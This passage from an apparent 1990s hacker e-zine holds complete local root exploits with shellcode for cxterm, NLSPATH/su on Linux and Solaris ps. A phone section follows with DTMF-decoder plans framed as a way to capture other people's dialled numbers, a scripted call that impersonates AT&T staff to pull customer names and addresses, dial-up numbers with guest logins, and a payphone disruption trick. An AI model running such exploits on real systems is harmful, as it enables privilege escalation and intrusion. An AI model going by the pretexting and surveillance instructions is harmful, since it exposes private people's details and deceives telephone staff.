ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*

cxterm buffer overflow exploit for Linux. This code is tested on
both Slackware 3.1 and 3.2.

Ming Zhang
mzhang@softcom.net
*/


#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define CXTERM_PATH "/usr/X11R6/bin/cxterm"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i,OffSet = DEFAULT_OFFSET;

/* use a different offset if you find this program doesn't do the job */
if (argc>1) OffSet = atoi(argv[1]);

buff = malloc(2048);
if(!buff)
{
printf("Buy more RAM!\n");
exit(0);
}
ptr = buff;

for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE;
i+=NOP_SIZE) {
memcpy (ptr,nop,NOP_SIZE);
ptr+=NOP_SIZE;
}

for(i=0;i < strlen(shellcode);i++)
*(ptr++) = shellcode[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_sp() + OffSet;
ptr = (char *)addr_ptr;
*ptr = 0;
(void) fprintf(stderr,
"This bug is discovered by Ming Zhang
(mzhang@softcom.net)\n"
);
/* Don't need to set ur DISPLAY to exploit this one, cool huh? */
execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL);
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. Linux nlspath exploit : Solar Designer
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/*
* NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
* by Solar Designer, 1997.
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";

char *get_sp() {
asm("movl %esp,%eax");
}

#define bufsize 2048
char buffer[bufsize];

main() {
int i;

for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3072;

memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));

buffer[bufsize - 1] = 0;

setenv("NLSPATH", buffer, 1);

execl("/bin/su", "/bin/su", NULL);
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. Solaris 2.5.1 ps exploit : J. Zbiciak
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

#!/bin/sh
#
# Exploit for Solaris 2.5.1 /usr/bin/ps
# J. Zbiciak, 5/18/97
#
# Just copy this into one file, upload it to a system, chmod 755 <file> and
# then run it using <file>

# change as appropriate
CC=gcc

# Build the "replacement message" :-)
cat > ps_expl.po << E_O_F
domain "SUNW_OST_OSCMD"
msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010"
E_O_F

msgfmt -o /tmp/foo ps_expl.po

# Build the C portion of the exploit
cat > ps_expl.c << E_O_F

/*****************************************/
/* Exploit for Solaris 2.5.1 /usr/bin/ps */
/* J. Zbiciak, 5/18/97 */
/*****************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH (632)
#define EXTRA (256)

int main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
/* ps will grok this file for the exploit code */
char *envp[]={"NLSPATH=/tmp/foo",0};
u_long *long_p;
u_char *char_p;
/* This will vary depending on your libc */
u_long proc_link=0xef70ef70;
int i;

long_p = (u_long *) buf;

/* This first loop smashes the target buffer for optargs */
for (i = 0; i < (96) / sizeof(u_long); i++)
*long_p++ = 0x10101010;

/* At offset 96 is the environ ptr -- be careful not to mess it up */
*long_p++=0xeffffcb0;
*long_p++=0xffffffff;

/* After that is the _ctype table. Filling with 0x10101010 marks the
entire character set as being "uppercase printable". */

for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++)
*long_p++ = 0x10101010;

/* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */
/* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */

/* build up _iob[1] */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */

/* build up _iob[2] */
*long_p++ = 0xFFFFFFFF; /* num chars in buffer */
*long_p++ = proc_link; /* pointer to chars in buffer */
*long_p++ = proc_link; /* pointer to buffer */
*long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */

*long_p =0;

/* The following includes the invalid argument '-z' to force the
usage msg to appear after the arguments have been parsed. */

execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
perror("execle failed");

return 0;
}
E_O_F

# Compile it
$CC -o ps_expl ps_expl.c

# And off we go!
exec ./ps_expl

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9. 0wned.c : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

/* THIS IS FUCKING PRIVATE SHIT, DONT DISTRIBUTE IT!@# */
/* I CODED THIS QUICKLY ONE NIGHT, IT WILL ROOT ANY LINUX 2.0.x BOX */
/* -D-O- -N-O-T- -D-I-S-T-R-I-B-U-T-E- */
/* so1o@insecurity.org */

main()

{
char a1='j',a2='0',a3='a',a4='r',a5='3';
char b1='w',b2='n',b3='d';
printf("%c%c%c %c%c%c\n",a1,a2,a2,a3,a4,a5);
printf("%c %c %c %c %c\n\n",a2,b1,b2,a5,b3);
printf("By so1o@insecurity.org 1997\n");
}

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. DTMF Decoder : xFli
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

DTMF Decoder plans.
-------------------

If you are into bigtime surveillance, or you just have some burning desire
to get the phone number of your sisters sexy friend, then you will be
interested in this little circuit. Basically, using this, you can use a tape
recorder and a pickup coil to record the DTMF tones sent when someone dials
a number, or if it is easier to you can wire it up to a phone jack and
decode in realtime, and then decode them to get the number dialled. This
can cope with speed dialling, but you will need a reasonably good recording
to decode successfully.

The circuit is simplicity itself, literally only 5 components. I could have
included an unreadable ascii circuit diag / pcb layout, but it would have been
a waste of time, so the diags are available from http://www.codez.com and other
CodeZero sites.

The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the
binary output of the ic is converted into standard numbers. The simple BASIC
program is included. Which is precompiled on http://www.codez.com

Component list:
----------------

1 x SSI202 18 pin Chip
1 x 3.579 MHz quartz crystal
2 x 27n Capacitors
1 x 1M resistor

Source:
--------

DTMF DECODER SOFTWARE
------------------------------------------

' Use this to decode the output from the decoder hardware
' Not written by xFli, suggested in an electronics mag.

10 CLS:KEY OFF
20 I=INP(&H279)
30 IF (I AND 128)=128 THEN 30
40 C=0
50 IF (I AND 8)=8 THEN C=C+1
60 IF (I AND 16)=16 THEN C=C+2
70 IF (I AND 32)=32 THEN C=C+4
80 IF (I AND 64)=64 THEN C=C+8
90 IF C=11 THEN PRINT" * ";:GOTO 180
100 IF C=12 THEN PRINT" # ";:GOTO 180
110 IF C=13 THEN PRINT" A ";:GOTO 180
120 IF C=14 THEN PRINT" B ";:GOTO 180
130 IF C=15 THEN PRINT" C ";:GOTO 180
140 IF C=0 THEN PRINT" D ";:GOTO 180
150 IF C=10 THEN PRINT" 0 ";:GOTO 180
160 PRINT C;
170 I=INP(&H279)
180 IF (I AND 128)=0 THEN 180
190 T=TIMER
200 I=INP(&H279)
210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30
220 IF (I AND 128) = 128 THEN 210
230 GOTO 50

In the magazine, it is advised you use gw-basic, which is included with very
very early DOS versions. It may or may not work with qbasic etc. I don't know.
These are also for UK tones, maybe they are different in the US.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Dealing With Directory Assistance Operators : Qytpo
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Alright, this information should be made available to everyone who cares
to read it. Any information used from this article is to be used at a
persons own risk. i will not be held responsible if any of this is used
for wrongfull purposes- ( it can, you just have to get really creative ).

Well, to start off, the job of the directory assistance operator, is to
give out addresses, phone numbers, and area codes, for the information
given to them. The operators can search from names, business names, and
government names, despite what anyone tells you, an AT&T DIRECTORY
ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address)
If the particular operator says they cant, then bug them. yell at them.
if they dont do it themselves, they will get their supervisor. and if you
make it sound really important they can do it. and if all that doesnt
work, try to find a naive operator, tell them you are an AT&T
administrator, and say, to press (Control+C) to bring up a CNA search on
their switch. A CNA search is a very valuable asset, if you cannot find a
CNA operator, give a directory assistance operator a whirl, chances are,
if you have a brain, and are a decent actor, you can get the listing for
the number you give them.

Routing.

The calls are routed through a large mainframe in each state department
How it works: Say you dial, 602-555-1212. that would put you through to an
operator ANYWHERE in the United States, where phoenix calls are routed
through to. it will not just appear in 602, allthought that is where it is
supposed to. If the switches in 602 are full, the call could end up
anywhere in the US.

When the operator picks up the reciever- (it is actually a headset that
beeps). The call is automatically traced to whatever area code they
dialed. so if You dialed (602 555 1212). an operator anywhere in the US,
would get a listing on their screen, and a default city, in the upper left
hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area
code, 602 for example, the operator can search the area codes permitted in
that area code..]

for example, if you dialed 602-555-1212, the operator would be allowed to
search in 502 (the other area code in AZ) However, in some area codes,
they will make you redial, like LA, or TEXAS, or NEWYORK;
they have so many area codes, For example 310 and 210, in LOS ANGELES
If you wanted a listing for LOS ANGELES, and dialed 210-555-1212,
and wanted a listing for city in los angeles which was 310, they would
make you hang up and dial 310-555-1212. (the operator
shuld be saying to himself/herself, "no, this kiddie needz to call 310
instead, or i get fired for giving out bad information"
...if they have a
clue)

Sample Call to a D A O for a CNA Search: ( The best way to get info )

( caller dials 555-1212 in area code )

<Operator > City please?
<Caller > Yes, this is James Thornton at AT&T the AT&T administrative
assistance office. I need you to do a CNA Search for me.
<Operator > I'm sorry sir, we're not permitted to do CNA searches.
<Caller > Yes, I know. May I speak to a supervisor?
<Supervisor> This is So and So supervisor, how can I help you sir?
<Caller > Yes, this is James Thornton down at the AT&T (also called Excel)
office in Florida, we need a CNA search done for a XXX-XXX-XXXX.
<Supervisor> One moment please.
<Caller > Ok.
<Supervisor> Ok, I am (or am not) showing a listing for XXX-XXX-XXXX,
would you like that listing sir?
<Caller > Yes please, and I would like that verbally. (if you time it just
right, you can get the info for free. if yer beige boxing, it
doesnt really make a difference tho.) - hang up, say "what" a few
times, to make it sound like you didnt get the listing. and hang up
before she finishes the second time. she can only bill you while
you are on the line, and if she fucks up, you can get away with it
with no bill while they read you the number. This method only
works for a verbal listing. if yer quick enough. ;)

- - - The NPA RULES. - - -

NPA dialed : NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED

-----California----
213 213
209 408 510 707 916
408 209 510
415 510 707
510 209 408 415 707 916
707 209 415 510 916
714 714
916 209 510 707

-------Texas-------
210 512 915
214 817 903 972
281 409 713
409 281 512 713 817 903
512 210 409 817 915
713 281 409
806 817 915
817 214 409 512 806 903
903 214 409 817
915 210 512 806 817
972 214 817 903


-----New York------
212 718 914 917
315 518 607 716
516 718
518 315 607 914
607 315 518 716 914
716 315 607
718 212 518 914
914 212 518 607 718
917 (cell) 212 718 914

*note*: all other states can search all NPA's listed in that state.

- Qytpo (@#hackers on EFnet)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Some Interesting ph0ne #'s [04.07.97]
[RUSSiA] +7 095 XXXxxxx
written by CyberLirik (lirik@hotmail.com) [www.sqrt.com]

----------------------------------------------------------------
AT&T Calling Cards Service
----------------------------------------------------------------

9740074 Tone System - AT&T Moscow HQ
switch to tone mode
press 0 to page operator
then by pressing "1" ya can record your voice message
then by pressing "2" & "3" ya can hear your record :)

7555042 English-speeking AT&T operator
1555042 Also Automate AT&T Calling System is here ( tone )

7555555 Russian-speeking AT&T operator
1555555 No AT&T Tone Machine !

----------------------------------------------------------------
Sprintnet Local Dial-Ups 02501 & 03110 DNICs
GlobalOne = Sprintnet = Telenet
----------------------------------------------------------------

9286344 9600
9280985 9600
9137166 9600 < Only for MAIL
5789119 2400
3428376 9600 real connect 2400
9167373 SprintNet V34-19200
9167272 ???
9167171 ?

00wait8 RoSprint PPP dialup.

----------------------------------------------------------------
ROSPAC Local Dial-Ups 02500 DNIC
----------------------------------------------------------------

9270003 9600
9563692 9600
9563690

----------------------------------------------------------------
RosNet Dialups 02506 DNIC
----------------------------------------------------------------

975-8403
913-3571
921-2103
201-2030 Voice:(095)206-8570,206-8458,206-7238
442-6422
442-8277
442-7022
442-8388
442-7088
442-8577
442-8077
442-6477
20-906,33-571 Iskra-2

----------------------------------------------------------------
IBM GLOBAL network Dial-Up (aka old Advantis Network)
----------------------------------------------------------------

2586420

----------------------------------------------------------------
Russia@Online Dial-Ups 28.8Kbps
----------------------------------------------------------------

9132376 30 lines
2584120 60 lines
3619999
2584161 Voice phone !

----------------------------------------------------------------
InfoNet Euro
----------------------------------------------------------------

9150001 28.8
9150005 28.8
2400 temp [unpublished]
2400 temp [unpublished]
2400 temp [unpublished]
2400 temp [unpublished]

2927056 Infonet Euro Voice !

----------------------------------------------------------------
Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} )
----------------------------------------------------------------

9563589 14400
9676767
9676730-9676769
9676767
9676784

9562455 SITA voice! phones
9564736

----------------------------------------------------------------
BT-Tymnet
----------------------------------------------------------------

956-0699 9600 Real Tymnet Voice 9563678
503/9563691 TYM-X25 Sync

----------------------------------------------------------------
CentroNet DialUp www.astro.ru
----------------------------------------------------------------

7511704 14400

----------------------------------------------------------------
Infotel dialUps [02504]
----------------------------------------------------------------

9585475
9580226
9580825
9580575

----------------------------------------------------------------
MMTEL DialUPs [02503] address on login:.db
----------------------------------------------------------------

3371001 5 lines
2419860
2418340
2461661

----------------------------------------------------------------
www.Cityline.ru V34
----------------------------------------------------------------

2587884 40 lines
9567759 20
2341901 10
2450070 10
2454414 10

----------------------------------------------------------------
http://www.telekom.ru Elvis+
Proxy 194.190.195.71. DNS 195.190.195.66. temp 192.168.12.1
SLIP login: iptest PPP login: pptest Password: guest
----------------------------------------------------------------

974-51-22 (24 «¨­¨¨)
961-51-22 (24 «¨­¨¨)
230-61-84 (5 «¨­¨©)
152-53-44 152-97-47 152-94-09
152-31-72 152-93-32
152-53-29 152-93-33
152-41-09 152-53-38
258-96-31 (30 «¨­¨©) 247-66-22 (30 «¨­¨©)
532-82-47 ‡¥«¥­®£à ¤áª¨© 㧥«
532-81-98 532-81-29

----------------------------------------------------------------
www.dataforce.net
----------------------------------------------------------------

9566749 voice 2889340
2340591 (16 «¨­¨©)

----------------------------------------------------------------
PTT-Teleport www.ptt.ru
----------------------------------------------------------------

946-9383 voice about x.25,28,etc
946-9393 modem PPP

----------------------------------------------------------------
Demos 33.8 V34 HST
----------------------------------------------------------------

958-19-75
958-19-81 l:_demo
956-62-85 p: demo
956-62-86
241-05-05
961-32-00

----------------------------------------------------------------
Dial ups mailto:_CRUSAIDER2_@MSN.COM
----------------------------------------------------------------

281-0201
975-0520
(37)

----------------------------------------------------------------
INTEL PORT :
----------------------------------------------------------------

956-4787 Main
434-1565 Registration
202-6934 Demo

----------------------------------------------------------------
Youth Science Center Linux server Dmitry Ablov 9540012
----------------------------------------------------------------

Data lines: Line 1: 954-0664 (14400, 24h, UUPC only)
2: 954-0058 (14400, 21:00 - 09:00)
3: 954-0914 ( 9600, 21:00 - 09:00)
4: 954-0147 (33600, 24h, PPP only)
5: 954-0144 (33600, 24h, RAS only)
6: 954-0445 (33600, 24h, restricted)

----------------------------------------------------------------
Comstar Dialup
----------------------------------------------------------------

2324626
2329696

----------------------------------------------------------------
www.com2com.ru
----------------------------------------------------------------

234-7171 PPP check
956-0112 PPP check

----------------------------------------------------------------
www.gamma.ru
----------------------------------------------------------------

742-04-42 (6 «¨­¨© USR Courier 33600)
232-68-06 (5 «¨­¨© USR Courier 33600)
913-39-44 (1 «¨­¨ï USR Courier 33600)
939-15-57 (1 «¨­¨ï USR Sportster 28800)
939-35-26 (1 «¨­¨ï USR Sportster 28800)
939-26-18 (Zyxel 19200)
932-88-78 (1 «¨­¨ï GVC 2400)
939-18-51 (1 «¨­¨ï GVC 2400)

----------------------------------------------------------------
Mr Postman sunny.aha.ru
----------------------------------------------------------------

9566243 42?lines USRobotics Courier V.Everything (33600 V.34+)
9560124 JS Comstar
2512555 MGTS (Moscow PSTN), Miusskiy node
2512591
2511030

----------------------------------------------------------------
www.co.ru Combellga
----------------------------------------------------------------

9265020
9357120 (¢á¥£® 30 ¢å®¤®¢)

----------------------------------------------------------------
www.techno.ru
----------------------------------------------------------------

234-33-03 (á¥à¨ï 8 ⥫.)
965-09-93
965-09-01
465-67-07
463-25-20
461-82-11
965-10-19 (28 «¨­¨©)
Online guest 234-35-99

----------------------------------------------------------------
www.redline.ru
----------------------------------------------------------------

956-67-56
928-84-29 (á¥à¨ï 17 «¨­¨©)
200-24-71

----------------------------------------------------------------
www.netclub.ru
----------------------------------------------------------------

2476205 (US Robotics 33600)
2476204 (Zuxel)

----------------------------------------------------------------
www.space.ru
----------------------------------------------------------------

913-50-20
747-33-55 (¢á¥£® 33 «¨­¨¨)

----------------------------------------------------------------
www.relcom.ru
----------------------------------------------------------------

946-99-84
946-99-94
926-50-18
947-55-99
913-57-47
753-07-77
742-57-27

----------------------------------------------------------------
www.sitek.ru
----------------------------------------------------------------

963-31-01
963-21-01
963-11-01
964-10-01 (60 «¨­¨©).

----------------------------------------------------------------
www.glasnet.ru
----------------------------------------------------------------

928-44-46
928-00-53
262-02-09
262-20-72
262-02-27
927-41-11
975-00-54
971-52-01 (¢á¥£® ¡®«¥¥ 170 ¬®¤¥¬­ëå ¢å®¤®¢).

----------------------------------------------------------------
www.synapse.ru
----------------------------------------------------------------

201-25-87
203-47-44(â)
956-47-87(â)

----------------------------------------------------------------
web.rosmail.com POCHET
----------------------------------------------------------------

924-85-69
956-61-02(30 ¢å®¤®¢)

----------------------------------------------------------------
www.park.ru
----------------------------------------------------------------

247-62-36
932-91-40

----------------------------------------------------------------
www.rinet.ru
----------------------------------------------------------------

9567800
9138111 (33600)

----------------------------------------------------------------
www.compnet.ru
----------------------------------------------------------------

964-31-01
963-20-01

----------------------------------------------------------------
www.corbina.ru
----------------------------------------------------------------

7559298 (USR Courier 33600)
7851102

----------------------------------------------------------------
Misc Voice/t0ne/Carrier services
----------------------------------------------------------------

00wait5 STB Card processing center
00wait9 free information service

9629424 demo user code : 12345 FaxInfo Demo Voice Line
9759220 Telephone Voice Bulletin Board

7059285 leave me mail in 80718 box

9253503 Online registration 4 email
9253507 billing for telephone #

2587474 Logon:
2586435
2586411
2586414
30;32
9269199
9500885
9563686
9564787 Interport Mailbox ( t0ne )
9560050 Unknown system ( t0ne )
9585474 PassWord:
7473355 ASVT Dial Up Gateway 2 Users: Oleg & Alex

9560885 "The Microsoft Network is no longer
providing MSN in Russia"


----------------------------------------------------------------
_always_ BUSY #s ( unpluged )
----------------------------------------------------------------

111-11xx
222-2222
980xxxxx-999xxxxx

----------------------------------------------------------------
Gate to Iskra2 lines
----------------------------------------------------------------

742xxxx Call for 8-097-2nodes
913xxxx Call for 8-097-3nodes

-=-=-=-=-=-=-=-=-=-=-= Free 800 Services =-=-=-=-=-=-=-=-=-=-=-
þ Moscow #s

7473320 Rus MCI Operators in California
7473322 Eng connect me to Customer's Service in Russian
7473321 AT&T Operators in New-York
7473323
7473324 Sprint Global, Arizona, USA
7473325 Orua,Canada
7473326 Otele Code ?
7473327 National Calling Center, UK
7473328
7473329 Japan
7473356 Sprint Calling Cards
7473357
7473359 France service
7473360
7473361 Italian service
7473363 Chili ? service

þ National Russian #s

8-10 800 4977211 - ‘˜€( AT&T);
8-10 800 4977222 - ‘˜€( MCI);
8-10 800 4977255 - ‘˜€( Sprint) ;
8-10 800 4977220 - ‘˜€(MCI àãá᪮ï§ëç­ ï á«ã¦¡ );
8-10 800 4977233 - Š ­ ¤  (Teleglob);
8-10 800 4977266 - ‚¥«¨ª®¡à¨â ­¨ï(BT);
8-10 800 4977277 - ‚¥«¨ª®¡à¨â ­¨ï( Mercuri);
8-10 800 4977288 - ‚¥­£à¨ï;
8-10 800 4977181 - Ÿ¯®­¨ï ( KDD);
8-10 800 4974358 - ”¨­«ï­¤¨ï( Telecom Finland);
8-10 800 4977032 - ¥«ì£¨ï (Belgacom, calling cards);
8-10 800 4977212 - ¥«ì£¨ï ( Belgacom,operator);
8-10 800 4977039 - ˆâ «¨ï (Iritel);
8-10 800 4977353 - ˆà« ­¤¨ï ( Telecom Iriland);
8-10 800 4977156 - ѬǬ;
8-10 800 4977165 - ‘¨­£ ¯ãà;
8-10 800 4977141 - ˜¢¥©æ à¨ï.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. How to fuck over a UK payphone : so1o / NightRage
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

We found this out by total coincidence at the Bristol 2600 meeting...

This is a DoS (Denial of Service) attack for payphones in the UK, it uses
the national test number (175) and your local test number - at your local
excahnge, which in Bristol is 17070 (I think), so you do the following...

1) Approach the telephone booth.
2) Pick up the handset.
3) Put 10p into the phone - you will get this back.
4) Dial your local excahnge test number.
5) Put the handset down.
6) Pick the handset up.
7) Dial your national exchange test number.
8) Listen to all the noise and shit for about 10 seconds.
9) Put the handset down.

The LCD display in the booth will now say words to the following..

"BT Apologise, but this telephone is out of order."

About 30 seconds later, the phone will return back to normal.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Radio link for TI-85 calculators : Michael Jan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

********************************************************************
-- INTRO -----------------------------------------------------------
********************************************************************

RT LINK (Radio transfer link) basicly functions like a regular
TI-LINK except it is wireless! The parts for making this link will
cost around $15 - $20 dollars for a pair, and the frequency is adjustable.

You may post & share this plan. But please give me credit for my
work (at least put my name, Michael Jan). I TESTED this plan, they transfer
within the range of 30 to 50 feet. (Which is more than what I expected,
great!). The following are the parts you need, you can obtain them at R.S.


********************************************************************
-- PARTS -----------------------------------------------------------

  
********************************************************************

PARTS VALUE QUANTITY
--------------------------------------------------------------------

TI LINK [TI BLACK LINK] 1
(Cut Into 2)

Capacitors [470 pF] 2
[100 pF] 2
[10 pF] 2
[4 pF] 4
[.01 uF] 2
[10 uF] 4

Resistors [10K Ohm] 2
[1.2K Ohm] 2
[33K Ohm] 4
[100 Ohm] 2
[180 Ohm] 2

Transistors [2SC1923] 4

Coil(L) [.27-.3] 4

Battery Holder [Holds 2 AA or 2 AAA] 2

Batteries [AA or AAA] 4

Diode [Germanium] 2

Copper Wire [2 Feet] 2
(Ant.)

*****************************************************************************
*** NOTE The Parts Are For TWO RT LINKs, Because They ONLY WORK In PAIRS! ***
*****************************************************************************

*******************************************************************
-- DIRECTIONS -----------------------------------------------------
*******************************************************************

1. Print Out The Schematic Diagram (The Included GIF File), It is
Easier To Put Parts Together.

2. Put The Parts Together By Following The Diagram (VERY IMPORTANT).
*** NOTE For Schematic Diagram --

Red Wire = From TI Link
White Wire = From TI Link
(Copper Wire From TI Link Will Not Be Use)

R = Resistors
C = Capacitors
T = Transistors

Connect +, - To Battery Holder

3. Adjust The 4 Coil(L)s Clockwise To MAX On Both RT Links.
This Will Adjust The Frequences On Both LINKs To Be The Same.
(You Can Adjust To Any Frequence You Like Between 90MHz-100MHz)

4. Put 2 Batteries Into Both Holders

5. THAT'S IT!!!, ENJOY YOUR RT-LINK !!!! =)

